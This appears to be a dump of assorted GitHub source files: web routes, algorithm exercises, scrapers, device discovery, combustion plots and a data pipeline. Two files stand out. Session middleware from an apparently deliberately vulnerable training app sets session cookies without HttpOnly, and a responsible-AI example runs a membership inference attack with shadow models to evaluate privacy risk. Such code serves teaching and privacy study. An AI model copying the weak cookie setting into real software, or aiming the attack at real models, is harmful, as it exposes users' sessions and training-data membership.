renderer_classes=[JSONRenderer])\n\ngame_get_by_score = GameViewSet.as_view({\n 'get': 'get_by_score'\n}, renderer_classes=[JSONRenderer])\n\ngame_get_by_price = GameViewSet.as_view({\n 'get': 'get_by_price'\n}, renderer_classes=[JSONRenderer])\n\nurlpatterns = format_suffix_patterns([\n path('', game_list, name='game-list'),\n path('/', game_detail, name='game-detail'),\n path('genres//', game_get_by_genre, name='game-by-genre'),\n path('scores/', game_get_by_score, name='game_by_score'),\n path('prices/', game_get_by_price, name='game_by_price'),\n])\n","repo_name":"Vitor-labs/Gamepy","sub_path":"backend/inventory/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":1110,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"5"} +{"seq_id":"30346800337","text":"n = int(input())\nwhile n > 0:\n data = input()\n a = \"\"\n b = \"\"\n for i in range(len(data)):\n if i % 2 == 0:\n a = a+data[i]\n else:\n b = b+data[i]\n print(f\"{a} {b}\")\n n = n-1\n","repo_name":"svrohith9/Algo-and-DS","sub_path":"python_codebase/LetsReview.py","file_name":"LetsReview.py","file_ext":"py","file_size_in_byte":225,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"5"} +{"seq_id":"2645688938","text":"import logging\n\nfrom aiohttp import web\nfrom aiohttp.web_exceptions import HTTPForbidden, HTTPInternalServerError\nfrom aiohttp_jinja2 import render_template\nfrom aiohttp_session import session_middleware as session_middleware_, get_session\nfrom aiohttp_session.redis_storage import RedisStorage\n\nlog = logging.getLogger(__name__)\n\n\n@web.middleware\nasync def session_middleware(request, handler):\n \"\"\"Wrapper to Session Middleware factory.\n \"\"\"\n # Do the trick, by passing app & handler back to original session\n # middleware factory. Do not forget to await on results here as original\n # session middleware factory is also awaitable.\n app = request.app\n storage = RedisStorage(app['redis'], httponly=False)\n middleware = session_middleware_(storage)\n return await middleware(request, handler)\n\n\n@web.middleware\nasync def csrf_middleware(request, handler):\n \"\"\"Provides csrf\"\"\"\n if request.method == \"POST\":\n session = await get_session(request)\n token = session.pop('_csrf_token', None)\n formdata = await request.post()\n if not token or token != formdata.get('_csrf_token'):\n log.error(\n 'Request to %s was aborted because CSRF tokens mismatched',\n request.rel_url\n )\n raise HTTPForbidden()\n return await handler(request)\n\n\ndef error_pages(overrides):\n @web.middleware\n async def middleware(request, handler):\n try:\n response = await handler(request)\n override = overrides.get(response.status)\n if override is None:\n return response\n else:\n return await override(request, response)\n except web.HTTPException as ex:\n override = overrides.get(ex.status)\n if override is None:\n raise\n else:\n return await override(request, ex)\n\n return middleware\n\n\nasync def handle_40x(request, exc):\n response = render_template('errors/40x.jinja2',\n request,\n {'error': exc})\n return response\n\n\nasync def handle_50x(request, exc):\n response = render_template('errors/50x.jinja2',\n request,\n {'error': exc})\n return response\n\n\nerror_middleware = error_pages({\n x: handle_40x if x < 500 else handle_50x\n for x in range(401, 600)\n})\n","repo_name":"anxolerd/dvpwa","sub_path":"sqli/middlewares.py","file_name":"middlewares.py","file_ext":"py","file_size_in_byte":2437,"program_lang":"python","lang":"en","doc_type":"code","stars":122,"dataset":"github-code","pt":"5"} +{"seq_id":"37351052113","text":"import Logger\n\nclass training_data_validator:\n def __init__(self):\n self.log_writer=Logger.logger_tool()\n self.file_object = open(\"Logs.txt\", 'a+')\n\n def check_logger(self):\n try:\n self.log_writer.log_this(self.file_object,\"logging checked\")\n except Exception as e:\n raise e\n\n","repo_name":"yashnth19/first_project","sub_path":"training_data_validation.py","file_name":"training_data_validation.py","file_ext":"py","file_size_in_byte":332,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"5"} +{"seq_id":"34720705369","text":"import requests\nfrom bs4 import BeautifulSoup\nimport pandas as pd\nfrom pandas import DataFrame as df\nimport time\ndef get_page_content(request_url):\n # 得到页面的内容\n headers={'user-agent': 'Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.131 Safari/537.36'}\n html=requests.get(url,headers=headers,timeout=10)\n content = html.text\n # 通过content创建BeautifulSoup对象\n soup = BeautifulSoup(content, 'html.parser', from_encoding='utf-8')\n return soup\n#分析当前页面的投诉信息\ndef analysis(soup):\n df_data = df(columns=['id', 'brand', 'car_model', 'type', 'desc', 'problem', 'datetime', 'status'])\n #完整的投诉信息框\n temp=soup.find('div',class_='tslb_b')\n # 找出所有的tr,即行\n tr_list=temp.find_all('tr')\n for tr in tr_list:\n td_list=tr.find_all('td')\n #如果没有表头,就是表头th\n if len(td_list)>0:\n temp_list=[]\n #投诉编号,投诉品牌,投诉车系,投诉车型,问题简述,典型问题,投诉时间,投诉状态\n '''\n #老师讲的方法为使用字典添加\n id,brand,car_model,type,desc,problem,datetime,status=\\\n td_list[0].text,td_list[1].text,td_list[2].text,td_list[3].text,\\\n td_list[4].text,td_list[5].text,td_list[6].text,td_list[7].text\n temp={}\n temp['id']=id\n temp['brand'] = brand\n temp['car_model'] = car_model\n temp['type'] = type\n temp['desc'] = desc\n temp['problem'] = problem\n temp['datetime'] = datetime\n temp['status'] = status\n df_data=df_data.append(temp,ignore_index=True)\n '''\n # print(id,brand,car_model,type,desc,problem,datetime,status)\n #此处使用list循环添加,相对简洁一些\n for i in range(8):\n temp_list.append(td_list[i].text)\n df_data.loc[len(df_data)] = temp_list\n return df_data\n#开始计时\ntime1=time.time()\nresult_df=df(columns=['id', 'brand', 'car_model', 'type', 'desc', 'problem', 'datetime', 'status'])\n# 请求URL\nbase_url = 'http://www.12365auto.com/zlts/0-0-0-0-0-0_0-0-'\n#设定网页遍历的页码数\npage_num=20\nfor i in range(page_num):\n #拼接页面url\n url=base_url+str(i+1)+'.shtml'\n #soup解析\n soup=get_page_content(url)\n #通过解析,得到当前页面dataframe\n df_data=analysis(soup)\n result_df=result_df.append(df_data)\nresult_df.to_excel(\"car_complain_20210209.xlsx\",index=False)\nresult_df.to_csv(\"car_complain_20210209.csv\",index=False)\nprint(\"共用时%s秒.\"%(time.time()-time1))\n","repo_name":"fandy422/DataEngine","sub_path":"L2/car_complain_bs4.py","file_name":"car_complain_bs4.py","file_ext":"py","file_size_in_byte":2706,"program_lang":"python","lang":"zh","doc_type":"code","stars":0,"dataset":"github-code","pt":"5"} +{"seq_id":"41982823143","text":"'''\nIn this example we learn about how to evaluate model risk for membership inference attacks (MIA) attacks, \nwhen adversaries are able to copy the principal model functionality and trigger adversarial attacks.\n\nThis risk assessment framework first uses public data (here we have used adult_income dataset) to train a set of shadow models, that can emulate/mimic a target model’s functionality. In the next step, an attack model is trained to reveal the membership status of a sample using outputs from the shadow models. At last we evaluate different attack model performance metrics to validate how accurately it has been crafted.\n'''\n\nimport numpy as np\nimport pandas as pd\n\n# depent on tensorflow 1.14\nimport tensorflow as tf\nprint(tf. __version__)\n\nfrom mia.estimators import ShadowModelBundle, prepare_attack_data\nfrom sklearn.ensemble import RandomForestClassifier\nfrom sklearn.utils import resample\nfrom tensorflow import keras\nfrom tensorflow.keras.layers import Dense\nfrom tensorflow.keras.models import Sequential\nfrom tensorflow.keras.regularizers import l1\n\nfrom tensorflow.keras.layers import Conv1D, AveragePooling1D, Dropout, Flatten, Dense, MaxPooling1D\nfrom tensorflow.keras.models import Sequential\nfrom tensorflow.keras.regularizers import l1\nfrom tensorflow.keras.utils import to_categorical\n\n# privacy package\nfrom sklearn.metrics import precision_score\nfrom sklearn.metrics import recall_score\nfrom sklearn.metrics import f1_score\nfrom sklearn.metrics import accuracy_score\n\nfrom tensorflow_privacy.privacy.optimizers.dp_optimizer_keras import DPKerasSGDOptimizer\nfrom tensorflow_privacy.privacy.analysis.rdp_accountant import compute_rdp\nfrom tensorflow_privacy.privacy.analysis.rdp_accountant import get_privacy_spent\n\n#privacy.optimizers.dp_optimizer import DPGradientDescentGaussianOptimizer tensorflow_privacy previous version compatible with 1.1.15\n\npath = '' # Use your system path till DP_memebrship_inference diectory\n\n# set random seed\nimport random\nrandom.seed(19122)\n\n# set random seed\nnp.random.seed(19122)\ntf.random.set_seed(19122)\n\nGradientDescentOptimizer = tf.compat.v1.train.GradientDescentOptimizer\n\ndef compute_epsilon(steps):\n \"\"\"Computes epsilon value for given hyperparameters.\"\"\"\n if noise_multiplier == 0.0:\n return float('inf')\n orders = [1 + x / 10. for x in range(1, 100)] + list(range(12, 64))\n sampling_probability = batch_size / 60000\n rdp = compute_rdp(q=sampling_probability,\n noise_multiplier=noise_multiplier,\n steps=steps,\n orders=orders)\n # Delta is set to 1e-5 because MNIST has 60000 training points.\n return get_privacy_spent(orders, rdp, target_delta=1e-5)[0]\n\ndef split_to_be_divisible(X, y, shadow_perc, batch_size):\n \"\"\"\n Split a dataframe into target dataset and shadow dataset, and make them divisible by batch size.\n\n :param X: genotype data\n :param y: phenotype data\n :param shadow_perc: specified percent for shadow dataset, target_perc = 1 - shadow_perc\n :param batch_size: batch_size for training process\n\n :return: target datasets, shadow datasets\n \"\"\"\n\n # stop and output error, if X and y have different number of individuals.\n assert y.shape[0] == X.shape[0]\n\n # calculate sample size of target and shadow\n total_row = X.shape[0]\n num_shadow_row = int(total_row * shadow_perc) - int(total_row * shadow_perc) % batch_size\n num_target_row = (total_row - num_shadow_row) - (total_row - num_shadow_row) % batch_size\n\n # split train and valid\n random_row = np.random.permutation(total_row)\n shadow_row = random_row[:num_shadow_row]\n target_row = random_row[-num_target_row:]\n\n print(target_row, shadow_row, random_row)\n\n target_X = X.iloc[target_row]\n shadow_X = X.iloc[shadow_row]\n\n target_y = y.iloc[target_row]\n shadow_y = y.iloc[shadow_row]\n\n return target_X, target_y, shadow_X, shadow_y\n\n\ndef target_model(input_shape):\n \"\"\"The architecture of the target model.\n The attack is white-box, hence the attacker is assumed to know this architecture too.\n\n :return: target model\n \"\"\"\n classifier = Sequential()\n classifier.add(Conv1D(filters=64, kernel_size=3, activation='relu', input_shape=(input_shape)))\n classifier.add(Conv1D(filters=64, kernel_size=3, activation='relu'))\n classifier.add(Dropout(0.5))\n classifier.add(MaxPooling1D(pool_size=2))\n classifier.add(Flatten())\n classifier.add(Dense(100, activation='relu'))\n classifier.add(Dense(2, activation='softmax'))\n\n\n if dpsgd:\n optimizer = DPKerasSGDOptimizer(\n l2_norm_clip=l2_norm_clip,\n noise_multiplier=noise_multiplier,\n num_microbatches=int(microbatches_perc * batch_size),\n learning_rate=learning_rate)\n # Compute vector of per-example loss rather than its mean over a minibatch.\n loss = tf.keras.losses.SparseCategoricalCrossentropy(from_logits=True, reduction=tf.compat.v2.losses.Reduction.NONE)\n else:\n optimizer = GradientDescentOptimizer(learning_rate=learning_rate)\n loss = tf.keras.losses.SparseCategoricalCrossentropy(from_logits=True, reduction=tf.compat.v2.losses.Reduction.NONE)\n\n # Compile model with Keras\n classifier.compile(optimizer=optimizer, loss=loss, metrics=['accuracy'])\n\n return classifier\n\n\ndef shadow_model():\n \"\"\"The architecture of the shadow model is same as target model, because the attack is white-box,\n hence the attacker is assumed to know this architecture too.\n\n :return: shadow model\n \"\"\"\n\n classifier = Sequential()\n classifier.add(Conv1D(filters=64, kernel_size=3, activation='relu', input_shape=(shadow_input_shape)))\n classifier.add(Conv1D(filters=64, kernel_size=3, activation='relu'))\n classifier.add(Dropout(0.5))\n classifier.add(MaxPooling1D(pool_size=2))\n classifier.add(Flatten())\n classifier.add(Dense(100, activation='relu'))\n classifier.add(Dense(2, activation='softmax'))\n\n\n if dpsgd:\n optimizer = DPKerasSGDOptimizer(\n l2_norm_clip=l2_norm_clip,\n noise_multiplier=noise_multiplier,\n num_microbatches=int(microbatches_perc * batch_size),\n learning_rate=learning_rate)\n\n # Compute vector of per-example loss rather than its mean over a minibatch.\n loss = tf.keras.losses.SparseCategoricalCrossentropy(from_logits=True, reduction=tf.compat.v2.losses.Reduction.NONE)\n else:\n optimizer = GradientDescentOptimizer(learning_rate=learning_rate)\n loss = tf.keras.losses.SparseCategoricalCrossentropy(from_logits=True, reduction=tf.compat.v2.losses.Reduction.NONE)\n\n # Compile model with Keras\n classifier.compile(optimizer=optimizer, loss=loss, metrics=['accuracy'])\n\n return classifier\n\n\ndef personal_income_classification():\n \"\"\"\n Load a dataset and encode categorical variables.\n\n \"\"\"\n df = pd.read_csv(path + \"data/adult.all.txt\", sep=\", \")\n print(df.shape)\n print(df.columns)\n\n #Renaming the columns\n df.columns = ['Age', 'Workclass', 'fnlwgt', 'Education', 'Education-num', 'Marital-status', 'Occupation',\n 'Relationship', 'Race', 'Sex', 'Capital-gain', 'Capital-loss',\n 'Hours-per-week', 'Native-country', 'Salary']\n\n df['Age'] = df['Age'].astype(np.float32)\n\n df['fnlwgt'] = df['fnlwgt'].astype(np.float32)\n df['Education-num'] = df['Education-num'].astype(np.float32)\n df['Capital-gain'] = df['Capital-gain'].astype(np.float32)\n df['Capital-loss'] = df['Capital-loss'].astype(np.float32)\n df['Hours-per-week'] = df['Hours-per-week'].astype(np.float32)\n\n df['Workclass'] = df['Workclass'].astype('category').cat.codes.astype(np.float32)\n df['Education'] = df['Education'].astype('category').cat.codes.astype(np.float32)\n df['Marital-status'] = df['Marital-status'].astype('category').cat.codes.astype(np.float32)\n df['Occupation'] = df['Occupation'].astype('category').cat.codes.astype(np.float32)\n df['Relationship'] = df['Relationship'].astype('category').cat.codes.astype(np.float32)\n df['Race'] = df['Race'].astype('category').cat.codes.astype(np.float32)\n df['Sex'] = df['Sex'].astype('category').cat.codes.astype(np.float32)\n df['Native-country'] = df['Native-country'].astype('category').cat.codes.astype(np.float32)\n df['Salary'] = df['Salary'].astype('category').cat.codes.astype(np.float32)\n\n df_train = df[\n ['Age', 'Workclass', 'fnlwgt', 'Education', 'Education-num', 'Marital-status', 'Occupation', 'Relationship',\n 'Race', 'Sex', 'Capital-gain', 'Capital-loss',\n 'Hours-per-week', 'Native-country']]\n\n df_test = df[['Salary']]\n print(df.head())\n return df_train, df_test\n\ndef main():\n print(\"Training the target model...\")\n # split target dataset to train and valid, and make them evenly divisible by batch size\n\n target_X_train, target_y_train, target_X_valid, target_y_valid = split_to_be_divisible(target_X,\n target_y,\n 0.2,\n batch_size)\n\n target_X_train = target_X_train.values.reshape((target_X_train.shape[0], target_X_train.shape[1], 1))\n target_X_valid = target_X_valid.values.reshape((target_X_valid.shape[0], target_X_valid.shape[1], 1))\n\n input_shape = (target_X_train.shape[1], target_X_train.shape[2])\n\n\n tm = target_model(input_shape)\n tm.fit(target_X_train,\n target_y_train,\n batch_size=batch_size,\n epochs=epochs,\n validation_data=[target_X_valid, target_y_valid],\n verbose=1)\n\n print(\"Training the shadow models.\")\n # train only one shadow model\n SHADOW_DATASET_SIZE = int(shadow_X.shape[0] / 2)\n smb = ShadowModelBundle(\n shadow_model,\n shadow_dataset_size=SHADOW_DATASET_SIZE,\n num_models=1,\n )\n # Training the shadow models with same parameter of target model, and generate attack data...\n attacker_X, attacker_y = smb.fit_transform(shadow_X, shadow_y.values,\n fit_kwargs=dict(epochs=epochs,\n batch_size=batch_size,\n verbose=1),\n )\n\n print(\"Training attack model...\")\n clf = RandomForestClassifier(max_depth=2)\n clf.fit(attacker_X, attacker_y)\n\n # Test the success of the attack.\n ATTACK_TEST_DATASET_SIZE = unused_X.shape[0]\n # Prepare examples that were in the training, and out of the training.\n data_in = target_X_train[:ATTACK_TEST_DATASET_SIZE], target_y_train[:ATTACK_TEST_DATASET_SIZE]\n\n unused_X1 = unused_X.values.reshape((unused_X.shape[0], unused_X.shape[1], 1))\n\n data_out = unused_X1[:ATTACK_TEST_DATASET_SIZE], unused_y[:ATTACK_TEST_DATASET_SIZE]\n # Compile them into the expected format for the AttackModelBundle.\n attack_test_data, real_membership_labels = prepare_attack_data(tm, data_in, data_out)\n\n # Compute the attack accuracy.\n attack_guesses = clf.predict(attack_test_data)\n attack_accuracy = np.mean(attack_guesses == real_membership_labels)\n print('attack accuracy: {}'.format(attack_accuracy))\n acc = accuracy_score(real_membership_labels, attack_guesses)\n print('attack acc: {}'.format(acc))\n\n prec = precision_score(real_membership_labels, attack_guesses)\n print('Precision: {}'.format(prec))\n\n recall = recall_score(real_membership_labels, attack_guesses)\n print('Recall: {}'.format(recall))\n\n fscore = f1_score(real_membership_labels, attack_guesses)\n print('F1-Score: {}'.format(fscore))\n\n\nif __name__ == '__main__':\n\n # parameters\n dpsgd = True\n\n # target model hyper-parameters same as Lasso-dp\n epochs = 10\n batch_size = 8\n microbatches_perc = .5\n learning_rate = 0.01\n kernel_regularization = 1.2 #0.001352\n noise_multiplier = 1.4\n l2_norm_clip = 1.8 #1.0\n\n drop_prec = 0.25\n num_kernels = 8\n kernel_size = 5\n\n X, y = personal_income_classification()\n target_X, target_y, shadow_X, shadow_y = split_to_be_divisible(X, y, 0.5, batch_size=80)\n\n\n shadow_X, shadow_y, unused_X, unused_y = split_to_be_divisible(shadow_X,\n shadow_y,\n 0.3,\n batch_size)\n\n\n shadow_X = shadow_X.values.reshape((shadow_X.shape[0], shadow_X.shape[1], 1))\n shadow_input_shape = (shadow_X.shape[1], shadow_X.shape[2])\n main()\n\n sampling_probability = batch_size / 50000\n steps = epochs * 50000 // batch_size\n orders = [1 + x / 10. for x in range(1, 100)] + list(range(12, 64))\n rdp = compute_rdp(q=sampling_probability,\n noise_multiplier=noise_multiplier,\n steps=steps,\n orders=orders)\n\n epsilon = get_privacy_spent(orders, rdp, target_delta=1e-5)[0]\n print(\"Privacy Budget Epsilon\", epsilon)\n\n # param_grid = {\n # 'epochs': [50, 100],\n # 'batch_size': [8, 16],\n # 'microbatches_perc': [0.5, 1],\n # 'learning_rate': [0.01, 0.001],\n # 'kernel_regularization': [0, 0.001352],\n # 'noise_multiplier': [0.4, 0.6, 0.8, 1.0, 1.2],\n # 'l2_norm_clip': [0.6, 1.0, 1.4, 1.8],\n # 'verbose': [0]\n # }\n","repo_name":"PacktPublishing/Designing-Models-for-Responsible-AI","sub_path":"Chapter2/membership_inference/CNN-DP-membership-inference.py","file_name":"CNN-DP-membership-inference.py","file_ext":"py","file_size_in_byte":13706,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"5"} +{"seq_id":"72083786073","text":"N = int(input())\nballoon = list(map(int, input().split()))\nidx = 0\ncnt = 0\n\nwhile cnt < N - 1:\n print(idx + 1, end=\" \")\n paper = balloon[idx]\n goto = 1 if paper > 0 else -1\n paper *= goto\n balloon[idx] = 0\n \n step = 0\n\n while step < paper:\n idx += goto\n if idx >= N:\n idx -= N\n elif idx < 0:\n idx += N\n\n if balloon[idx] != 0:\n step += 1\n \n cnt += 1\n\nprint(idx + 1)\n","repo_name":"eora21/dj2_alg_study","sub_path":"python/b2346.py","file_name":"b2346.py","file_ext":"py","file_size_in_byte":456,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"5"} +{"seq_id":"4534434584","text":"# Goal = Given two strings, return true if string in ransomNote can be constructed from magazine.\n\n# track number of occurrences in magazine\n# iterate thru magazine\n# update tracker with chars in magazine\n# iterate thru ransomNote\n# check if char exists in tracker\n# if so the decrement\n# otherwise return false\n# return true if false is not triggered\n\nclass Solution:\n def canConstruct(self, ransomNote: str, magazine: str) -> bool:\n tracker = {}\n \n for char in magazine:\n if char in tracker:\n tracker[char] += 1\n else:\n tracker[char] = 1\n \n for char in ransomNote:\n if char in tracker and tracker[char] is not 0:\n tracker[char] -= 1\n else:\n return False\n \n return True\n\n# Time complexity = O(N)\n# Space complexity = O(N)\n","repo_name":"kevin-the-engi/leetcode-solutions","sub_path":"solutions/ransom-note/ransom-note.py","file_name":"ransom-note.py","file_ext":"py","file_size_in_byte":915,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"5"} +{"seq_id":"8990505762","text":"import requests\nfrom bs4 import BeautifulSoup\nimport time\n\n# 小说的主页面地址\nhome = 'https://www.biquwx.la/10_10218/'\n\n# 获取一个页内容\ndef one_page(url):\n\n # 把���码包装成浏览器\n headers = {\n # 用户标识\n 'User-Agent': 'Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/69.0.3497.100 Safari/537.36'\n }\n\n r =requests.get(url,headers=headers,stream=True)\n # 编码统一成utf-8\n r.encoding = 'utf-8'\n\n soup = BeautifulSoup(r.text,'html.parser')\n # 标题\n title = soup.find('div',class_='bookname').find('h1').text\n\n content =soup.find('div',id='content') # 小说文字内容\n content = str(content)\n\n # 内容过滤\n content = content.replace('
    ','')\n content = content.replace('
    ','\\n')\n content = content.replace('
    ','\\n')\n content = content.replace('','')\n content = content.replace('
    ','')\n\n # 把内容都分开存到单独的txt文件中\n # with open(title+'.txt','a+', encoding='utf-8') as f:\n # f.write(content)\n\n print(title +'爬取完成~')\n return content,title\n\n\nfor i in range(5001501,5001505): # 结局:5002115\n url =home+str(i)+'.html' # https://www.biquwx.la/10_10218/5001501.html\n time.sleep(1.5)\n content,title = one_page(url)\n # 把内容都放到一个txt文件中\n with open('斗罗大陆.txt','a+', encoding='utf-8') as f:\n f.write('\\r'+title+'\\r'+content)","repo_name":"ZhangTongLe/Python_Auto_pri","sub_path":"Day2/斗罗大陆.py","file_name":"斗罗大陆.py","file_ext":"py","file_size_in_byte":1498,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"5"} +{"seq_id":"2740400958","text":"\"\"\"\r\nThe itach driver discovery functions.\r\n\r\n\"\"\"\r\n\r\nimport logging\r\nimport socket\r\nimport struct\r\nimport time\r\nimport sys\r\nfrom typing import Callable\r\n\r\nimport pytach.const\r\n\r\n_LOGGER = logging.getLogger(__name__)\r\n\r\nasync def iTachDiscover(callback:Callable[[dict],None], timeout:int = 0) -> None:\r\n _LOGGER.debug(\"Starting discovery...\")\r\n\r\n # Setup the initial socket\r\n sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM, socket.IPPROTO_UDP)\r\n\r\n # Allow reuse\r\n sock.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)\r\n\r\n # Bind\r\n sock.bind(('',pytach.const.UDP_PORT))\r\n\r\n # Let the router/switch know that we want to recieve traffic\r\n group = socket.inet_aton(pytach.const.UDP_IP)\r\n mreq = struct.pack('4sL', group, socket.INADDR_ANY)\r\n sock.setsockopt(socket.IPPROTO_IP, socket.IP_ADD_MEMBERSHIP, mreq)\r\n\r\n # Endless loop of traffic\r\n stoptime = False\r\n if timeout:\r\n stoptime = time.time() + timeout\r\n\r\n def decodeMessage(data):\r\n ret = False\r\n try:\r\n tokens = data.split(\"<-\")\r\n for tok in tokens:\r\n pairs = tok.split(\"=\")\r\n if len(pairs) == 2:\r\n name = pairs[0].strip()\r\n val = pairs[1].strip()[:-1]\r\n\r\n if not ret:\r\n ret = {}\r\n\r\n ret[name] = val\r\n except:\r\n _LOGGER.warn(\"Exception decoding discovery message: %s\", sys.exc_info())\r\n\r\n return ret\r\n\r\n while True:\r\n try:\r\n _LOGGER.debug(\"Wating for message...\")\r\n data, address = sock.recvfrom(1024)\r\n _LOGGER.debug(\"Received %s bytes from %s: %s\", len(data), address, data)\r\n \r\n ret = decodeMessage(data.decode(\"utf-8\"))\r\n if ret:\r\n _LOGGER.debug(\"Decoded discovery: %s\",ret)\r\n\r\n typ = False\r\n\r\n if ret[\"Model\"] == \"iTachIP2IR\":\r\n typ = pytach.const.TYPE_IR\r\n elif ret[\"Model\"] == \"iTachIP2SL\":\r\n typ = pytach.const.TYPE_SL\r\n\r\n if typ:\r\n data = {\r\n pytach.const.CONF_NAME: ret[\"UUID\"],\r\n pytach.const.CONF_HOST: address[0],\r\n pytach.const.CONF_TYPE: typ,\r\n \"discovery\": ret\r\n }\r\n if callable(callback):\r\n callback(data)\r\n\r\n except:\r\n _LOGGER.warn(\"Exception in discovery: %s\", sys.exc_info(), exc_info=True)\r\n\r\n if stoptime:\r\n if time.time() > stoptime:\r\n _LOGGER.debug(\"Discovery timeout reached...\")\r\n break\r\n","repo_name":"rlsgit/pytach","sub_path":"pytach/discovery.py","file_name":"discovery.py","file_ext":"py","file_size_in_byte":2383,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"5"} +{"seq_id":"17200296893","text":"import cantera as ct\r\nimport numpy as np\r\nimport matplotlib.pyplot as plt\r\nfrom matplotlib import cm\r\nfrom matplotlib.ticker import LinearLocator\r\n\r\nnpoints = 50\r\n\r\ngas = ct.Solution('gri30.xml')\r\n\r\n# HP - adiabatic\r\n# SV - with constant volume\r\n\r\nequivalence_ratio_H2 = 'H2:1.0'\r\nequivalence_ratio_O2_N2 = 'O2:0.5, N2:1.88'\r\n\r\nphi = [0.5, 1, 2, 3, 4] \r\n\r\ntad05 = np.zeros(npoints)\r\ntad1 = np.zeros(npoints)\r\ntad2 = np.zeros(npoints)\r\ntad3 = np.zeros(npoints)\r\ntad4 = np.zeros(npoints)\r\n\r\ntad = [tad05, tad1, tad2, tad3, tad4] \r\n\r\n\r\ndef tempForDifferentPressures(equlibrium, T0):\r\n P = np.linspace(0.1*ct.one_atm, ct.one_atm*5, npoints)\r\n\r\n yLabelText = 'Adiabatic flame temperature [K]' if equlibrium == \"HP\" else 'Const. volume flame temperature [K]'\r\n\r\n for j in range(len(phi)):\r\n for i in range(npoints):\r\n gas.TP = T0, P[i]\r\n gas.set_equivalence_ratio(phi[j], equivalence_ratio_H2, equivalence_ratio_O2_N2)\r\n gas.equilibrate(equlibrium)\r\n tad[j][i] = gas.T\r\n\r\n fig, ax = plt.subplots()\r\n\r\n for j in range(len(phi)):\r\n plt.plot(P/100000, tad[j], label = '$ \\Phi$ = ' + str(phi[j]))\r\n \r\n handles, labels = ax.get_legend_handles_labels()\r\n ax.legend(handles, labels)\r\n ax.set(xlabel = 'Initial pressure [bar]', ylabel = yLabelText)\r\n ax.get_yaxis().get_major_formatter().set_useOffset(False)\r\n\r\n plt.savefig('plots/temp_for_diff_press_for_' + equlibrium)\r\n\r\n return plt \r\n\r\n\r\ndef tempForDifferentInitTemp(equlibrium, P0):\r\n T = np.linspace(273, 2000, npoints)\r\n\r\n yLabelText = 'Adiabatic flame temperature [K]' if equlibrium == \"HP\" else 'Const. volume flame temperature [K]'\r\n\r\n for j in range(len(phi)):\r\n for i in range(npoints):\r\n gas.TP = T[i], P0\r\n gas.set_equivalence_ratio(phi[j], equivalence_ratio_H2, equivalence_ratio_O2_N2)\r\n gas.equilibrate(equlibrium)\r\n tad[j][i] = gas.T\r\n\r\n fig, ax = plt.subplots()\r\n\r\n for j in range(len(phi)):\r\n plt.plot(T, tad[j], label = '$ \\Phi$ = ' + str(phi[j]))\r\n \r\n handles, labels = ax.get_legend_handles_labels()\r\n ax.legend(handles, labels)\r\n ax.set(xlabel = 'Initial temperature [K]', ylabel = yLabelText)\r\n ax.get_yaxis().get_major_formatter().set_useOffset(False)\r\n\r\n plt.savefig('plots/temp_for_diff_init_temp_for_' + equlibrium)\r\n\r\n return plt \r\n\r\n\r\ndef tempForPhi(phi, equilibrium):\r\n fig, ax = plt.subplots(subplot_kw={\"projection\": \"3d\"})\r\n\r\n temp = np.zeros( (npoints, npoints) )\r\n\r\n t = np.linspace(273, 2000, npoints)\r\n p = np.linspace(0.1*ct.one_atm, ct.one_atm*5, npoints)\r\n\r\n T, P = np.meshgrid(t, p)\r\n\r\n for i in range(npoints):\r\n for j in range(npoints):\r\n gas.TP = t[i], p[j]\r\n gas.set_equivalence_ratio(phi, equivalence_ratio_H2, equivalence_ratio_O2_N2)\r\n gas.equilibrate(equilibrium)\r\n temp[j][i] = gas.T\r\n\r\n surf = ax.plot_surface(P / 100000, T, temp, cmap=cm.coolwarm,\r\n linewidth=0, antialiased=False)\r\n\r\n ax.zaxis.set_major_locator(LinearLocator(10))\r\n ax.zaxis.set_major_formatter('{x:.0f}')\r\n ax.set(ylabel = 'Initial temperature [K]', xlabel = \"Initial pressure [bar]\")\r\n\r\n fig.colorbar(surf, shrink=0.5, aspect=5)\r\n\r\n label = 'Adiabatic flame temperature [K]' if equilibrium == \"HP\" else 'Const. volume flame temperature [K]'\r\n\r\n fig.suptitle(label + ' for $ \\Phi$ = ' + str(phi))\r\n\r\n plt.savefig('plots/3d_plot_for_phi=' + str(phi) + '_' + equilibrium + '.png')\r\n\r\n return plt\r\n","repo_name":"kamilmaciejczyk/MKWS2021-Cantera","sub_path":"functions.py","file_name":"functions.py","file_ext":"py","file_size_in_byte":3570,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"5"} +{"seq_id":"73657992151","text":"import os\nfrom datetime import datetime\n\nimport apache_beam as beam\nfrom apache_beam.options.pipeline_options import PipelineOptions\n\npipe_options_dict = {\n 'project': 'beam-apache'\n ,'runner': 'DataFlowRunner'\n ,'region': 'southamerica-east1'\n ,'staging_location': 'gs://staging-beam-ap/'\n ,'temp_location': 'gs://staging-beam-ap/temp/'\n ,'template_location': 'gs://beam-course/templates/batch_job_dataflow_BQ' # Will be used to import and run my code on DataFlow\n ,'save_main_session': True # To use my custom fn\n}\n\nSERVICE_ACC = '/home/kiq/Stud/Data_Engineer/Beam/beam-apache-fcf078c4c4b0.json'\nos.environ['GOOGLE_APPLICATION_CREDENTIALS'] = SERVICE_ACC\n\ndef to_dict(x): # We need to transform data on key:value to save on BigQuery\n \"\"\"\n Create a dict by a tuple of data.\n \"\"\"\n dict_data = {}\n dict_data['Name'] = x[0]\n dict_data['Count'] = x[1]\n return dict_data\n\nTABLE_SCHEMA = 'Name:STRING,Count:INTEGER' # To specify the column and the type on the BigQuery\nTABLE = 'beam-apache:saving_bigquery.saving_bigquery_table'\n\npipe_options = PipelineOptions.from_dictionary(pipe_options_dict)\n\npipe = 